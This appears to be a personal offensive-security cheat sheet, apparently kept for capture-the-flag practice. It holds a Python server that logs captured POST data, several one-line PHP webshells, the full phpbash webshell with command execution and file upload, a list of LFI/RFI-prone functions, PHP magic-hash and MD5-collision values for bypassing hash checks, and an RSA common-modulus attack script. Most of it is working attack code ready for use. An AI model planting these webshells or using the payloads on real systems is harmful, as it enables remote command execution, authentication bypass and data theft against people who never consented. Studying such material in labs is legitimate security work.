My Hacking Toolkit

Web

Temp Server (Python)

from http.server import SimpleHTTPRequestHandler, HTTPServer
from urllib.parse import unquote
class CustomRequestHandler(SimpleHTTPRequestHandler):

    def end_headers(self):
        self.send_header('Access-Control-Allow-Origin', '*')  # Allow requests from any origin
        self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')
        self.send_header('Access-Control-Allow-Headers', 'Content-Type')
        super().end_headers()

    def do_GET(self):
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b'Hello, GET request!')

    def do_POST(self):
        content_length = int(self.headers['Content-Length'])
        post_data = self.rfile.read(content_length).decode('utf-8')

        self.send_response(200)
        self.end_headers()

        # Log the POST data to data.html
        with open('data.html', 'a') as file:
            file.write(post_data + '\n')
        response = f'THM, POST request! Received data: {post_data}'
        self.wfile.write(response.encode('utf-8'))

if __name__ == '__main__':
    server_address = ('', 8080)
    httpd = HTTPServer(server_address, CustomRequestHandler)
    print('Server running on http://localhost:8080/')
    httpd.serve_forever()

One-liner Trojan (Backdoor, Webshell)

<?php @eval($_POST['shell']);?>
<?php @system($_POST["cmd"])?>
<?php passthru($_GET['cmd']); ?>
<? system($_GET["cmd"]); ?>
<?php
/* phpbash by Alexander Reid (Arrexel) */
if (isset($_POST['cmd'])) {
    $output = preg_split('/[\n]/', shell_exec($_POST['cmd'] . " 2>&1"));
    foreach ($output as $line) {
        echo htmlentities($line, ENT_QUOTES | ENT_HTML5, 'UTF-8') . "<br>";
    }
    die();
} else if (!empty($_FILES['file']['tmp_name']) && !empty($_POST['path'])) {
    $filename = $_FILES["file"]["name"];
    $path = $_POST['path'];
    if ($path != "/") {
        $path .= "/";
    }
    if (move_uploaded_file($_FILES["file"]["tmp_name"], $path . $filename)) {
        echo htmlentities($filename) . " successfully uploaded to " . htmlentities($path);
    } else {
        echo "Error uploading " . htmlentities($filename);
    }
    die();
}
?>

<html>

<head>
    <title></title>
    <style>
        html,
        body {
            max-width: 100%;
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            background: #282A36;
        }

        body,
        .inputtext {
            font-family: "Lucida Console", "Lucida Sans Typewriter", monaco, "Bitstream Vera Sans Mono", monospace;
            font-size: 14px;
            font-style: normal;
            font-variant: normal;
            font-weight: 400;
            line-height: 20px;
            overflow: hidden;
        }

        .console {
            width: 100%;
            height: 100%;
            margin: auto;
            position: absolute;
            color: #F8F8F2;
        }

        .output {
            width: auto;
            height: auto;
            position: absolute;
            overflow-y: scroll;
            top: 0;
            bottom: 30px;
            left: 5px;
            right: 0;
            line-height: 20px;
        }

        .input form {
            position: relative;
            margin-bottom: 0px;
        }

        .username {
            height: 30px;
            width: auto;
            padding-left: 5px;
            line-height: 30px;
            float: left;
        }

        .input {
            border-top: 1px solid #333333;
            width: 100%;
            height: 30px;
            position: absolute;
            bottom: 0;
        }

        .inputtext {
            width: auto;
            height: 30px;
            bottom: 0px;
            margin-bottom: 0px;
            background: #282A36;
            border: 0;
            float: left;
            padding-left: 8px;
            color: #F8F8F2;
        }

        .inputtext:focus {
            outline: none;
        }

        ::-webkit-scrollbar {
            width: 12px;
        }

        ::-webkit-scrollbar-track {
            background: #101010;
        }

        ::-webkit-scrollbar-thumb {
            background: #303030;
        }
    </style>
</head>

<body>
    <div class="console">
        <div class="output" id="output"></div>
        <div class="input" id="input">
            <form id="form" method="GET" onSubmit="sendCommand()">
                <div class="username" id="username"></div>
                <input class="inputtext" id="inputtext" type="text" name="cmd" autocomplete="off" autofocus>
            </form>
        </div>
    </div>
    <form id="upload" method="POST" style="display: none;">
        <input type="file" name="file" id="filebrowser" onchange='uploadFile()' />
    </form>
    <script type="text/javascript">
        var username = "";
        var hostname = "";
        var currentDir = "";
        var previousDir = "";
        var defaultDir = "";
        var commandHistory = [];
        var currentCommand = 0;
        var inputTextElement = document.getElementById('inputtext');
        var inputElement = document.getElementById("input");
        var outputElement = document.getElementById("output");
        var usernameElement = document.getElementById("username");
        var uploadFormElement = document.getElementById("upload");
        var fileBrowserElement = document.getElementById("filebrowser");
        getShellInfo();

        function getShellInfo() {
            var request = new XMLHttpRequest();

            request.onreadystatechange = function() {
                if (request.readyState == XMLHttpRequest.DONE) {
                    var parsedResponse = request.responseText.split("<br>");
                    username = parsedResponse[0];
                    hostname = parsedResponse[1];
                    currentDir = parsedResponse[2].replace(new RegExp("&sol;", "g"), "/");
                    defaultDir = currentDir;
                    usernameElement.innerHTML = "<div style='color: #BD93F9; display: inline;'>" + username + "@" + hostname + "</div>:" + currentDir + "#";
                    updateInputWidth();
                }
            };

            request.open("POST", "", true);
            request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
            request.send("cmd=whoami; hostname; pwd");
        }

        function sendCommand() {
            var request = new XMLHttpRequest();
            var command = inputTextElement.value;
            var originalCommand = command;
            var originalDir = currentDir;
            var cd = false;

            commandHistory.push(originalCommand);
            switchCommand(commandHistory.length);
            inputTextElement.value = "";

            var parsedCommand = command.split(" ");

            if (parsedCommand[0] == "cd") {
                cd = true;
                if (parsedCommand.length == 1) {
                    command = "cd " + defaultDir + "; pwd";
                } else if (parsedCommand[1] == "-") {
                    command = "cd " + previousDir + "; pwd";
                } else {
                    command = "cd " + currentDir + "; " + command + "; pwd";
                }

            } else if (parsedCommand[0] == "clear") {
                outputElement.innerHTML = "";
                return false;
            } else if (parsedCommand[0] == "upload") {
                fileBrowserElement.click();
                return false;
            } else {
                command = "cd " + currentDir + "; " + command;
            }

            request.onreadystatechange = function() {
                if (request.readyState == XMLHttpRequest.DONE) {
                    if (cd) {
                        var parsedResponse = request.responseText.split("<br>");
                        previousDir = currentDir;
                        currentDir = parsedResponse[0].replace(new RegExp("&sol;", "g"), "/");
                        outputElement.innerHTML += "<div style='color:#BD93F9; float: left;'>" + username + "@" + hostname + "</div><div style='float: left;'>" + ":" + originalDir + "# " + originalCommand + "</div><br>";
                        usernameElement.innerHTML = "<div style='color: #BD93F9; display: inline;'>" + username + "@" + hostname + "</div>:" + currentDir + "#";
                    } else {
                        outputElement.innerHTML += "<div style='color:#BD93F9; float: left;'>" + username + "@" + hostname + "</div><div style='float: left;'>" + ":" + currentDir + "# " + originalCommand + "</div><br>" + request.responseText.replace(new RegExp("<br><br>$"), "<br>");
                        outputElement.scrollTop = outputElement.scrollHeight;
                    }
                    updateInputWidth();
                }
            };

            request.open("POST", "", true);
            request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
            request.send("cmd=" + encodeURIComponent(command));
            return false;
        }

        function uploadFile() {
            var formData = new FormData();
            formData.append('file', fileBrowserElement.files[0], fileBrowserElement.files[0].name);
            formData.append('path', currentDir);

            var request = new XMLHttpRequest();

            request.onreadystatechange = function() {
                if (request.readyState == XMLHttpRequest.DONE) {
                    outputElement.innerHTML += request.responseText + "<br>";
                }
            };

            request.open("POST", "", true);
            request.send(formData);
            outputElement.innerHTML += "<div style='color:#BD93F9; float: left;'>" + username + "@" + hostname + "</div><div style='float: left;'>" + ":" + currentDir + "# Uploading " + fileBrowserElement.files[0].name + "...</div><br>";
        }

        function updateInputWidth() {
            inputTextElement.style.width = inputElement.clientWidth - usernameElement.clientWidth - 15;
        }

        document.onkeydown = checkForArrowKeys;

        function checkForArrowKeys(e) {
            e = e || window.event;

            if (e.keyCode == '38') {
                previousCommand();
            } else if (e.keyCode == '40') {
                nextCommand();
            }
        }

        function previousCommand() {
            if (currentCommand != 0) {
                switchCommand(currentCommand - 1);
            }
        }

        function nextCommand() {
            if (currentCommand != commandHistory.length) {
                switchCommand(currentCommand + 1);
            }
        }

        function switchCommand(newCommand) {
            currentCommand = newCommand;

            if (currentCommand == commandHistory.length) {
                inputTextElement.value = "";
            } else {
                inputTextElement.value = commandHistory[currentCommand];
                setTimeout(function() {
                    inputTextElement.selectionStart = inputTextElement.selectionEnd = 10000;
                }, 0);
            }
        }

        document.getElementById("form").addEventListener("submit", function(event) {
            event.preventDefault()
        });
    </script>
</body>

</html>

LFI & RFI

Dangerous Functions

FunctionRead ContentExecuteRemote URL
PHP
include()/include_once()
require()/require_once()
file_get_contents()
fopen()/file()
NodeJS
fs.readFile()
fs.sendFile()
res.render()
Java
include
import
.NET
@Html.Partial()
@Html.RemotePartial()
Response.WriteFile()
include

LFI2RCE

PHP Hash Bypass

Scientific Notation

Numbers

240610708 0e462097431906509019562988736854 
314282422 0e990995504821699494520356953734 
571579406 0e972379832854295224118025748221 
903251147 0e174510503823932942361353209384 
1110242161 0e435874558488625891324861198103 
1320830526 0e912095958985483346995414060832 
1586264293 0e622743671155995737639662718498 
2302756269 0e250566888497473798724426794462 
2427435592 0e067696952328669732475498472343 
2653531602 0e877487522341544758028810610885 
3293867441 0e471001201303602543921144570260 
3295421201 0e703870333002232681239618856220 
3465814713 0e258631645650999664521705537122 
3524854780 0e507419062489887827087815735195 
3908336290 0e807624498959190415881248245271 
4011627063 0e485805687034439905938362701775 
4775635065 0e998212089946640967599450361168 
4790555361 0e643442214660994430134492464512 
5432453531 0e512318699085881630861890526097 
5579679820 0e877622011730221803461740184915 
5585393579 0e664357355382305805992765337023 
6376552501 0e165886706997482187870215578015
7124129977 0e500007361044747804682122060876 
7197546197 0e915188576072469101457315675502 
7656486157 0e451569119711843337267091732412

String

aaaXXAYW 0e540853622400160407992788832284 
aabg7XSs 0e087386482136013740957780965295 
aabC9RqS 0e041022518165728065344349536299

Original Scientific Notation

0e215962017 0e291242476940776845150308577824

Array

In PHP, the default argument of the md5() function is string, when the argument is an array, the function will return null.

?user[]=1&pass[]=1

Collision

user=%D89%A4%FD%14%EC%0EL%1A%FEG%ED%5B%D0%C0%7D%CAh%16%B4%DFl%08Z%FA%1DA%05i%29%C4%FF%80%11%14%E8jk5%0DK%DAa%FC%2B%DC%9F%95ab%D2%09P%A1%5D%12%3B%1ETZ%AA%92%16y%29%CC%7DV%3A%FF%B8e%7FK%D6%CD%1D%DF/a%DE%27%29%EF%08%FC%C0%15%D1%1B%14%C1LYy%B2%F9%88%DF%E2%5B%9E%7D%04c%B1%B0%AFj%1E%7Ch%B0%96%A7%E5U%EBn1q%CA%D0%8B%C7%1BSP pass=%D89%A4%FD%14%EC%0EL%1A%FEG%ED%5B%D0%C0%7D%CAh%164%DFl%08Z%FA%1DA%05i%29%C4%FF%80%11%14%E8jk5%0DK%DAa%FC%2B%5C%A0%95ab%D2%09P%A1%5D%12%3B%1ET%DA%AA%92%16y%29%CC%7DV%3A%FF%B8e%7FK%D6%CD%1D%DF/a%DE%27%29o%08%FC%C0%15%D1%1B%14%C1LYy%B2%F9%88%DF%E2%5B%9E%7D%04c%B1%B0%AFj%9E%7Bh%B0%96%A7%E5U%EBn1q%CA%D0%0B%C7%1BSP

Others (References)

Crypto

Common Modulus Attack

from Crypto.Util.number import long_to_bytes

n = 8043524339665486501722690364841854181558012095441297536641336786057021881436981279151373985115124256457664918399612791182378270114245970486016546496099141
e1 = 863047
c1 = 977794351462943753500623403456170325029164798178157637276767524847451843872628142596652557213651039320937257524442343930998122764638359874102209638080782
e2 = 995023
c2 = 7803335784329682230086969003344860669091120072205053582211253806085013270674227310898253029435120218230585288142781999838242977459669454181592089356383378


def egcd(a: int, b: int) -> tuple[int, int, int]:
    if a == 0:
        return (b, 0, 1)
    g, y, x = egcd(b % a, a)
    return (g, x - (b // a) * y, y)


def inverse(a: int, b: int) -> int:
    g, x, y = egcd(a, b)  # ax + by = g
    if g == 1:
        return x % b
    raise ValueError("base is not invertible for the given modulus.")


g, x, y = egcd(e1, e2)

if x < 0:
    c1_inv = inverse(c1, n)
    c1 = pow(c1_inv, -x, n)
else:
    c1 = pow(c1, x, n)

if y < 0:
    c2_inv = inverse(c2, n)
    c2 = pow(c2_inv, -y, n)
else:
    c2 = pow(c2, y, n)

m = (c1 * c2) % n
print(long_to_bytes(m))

Hash Collision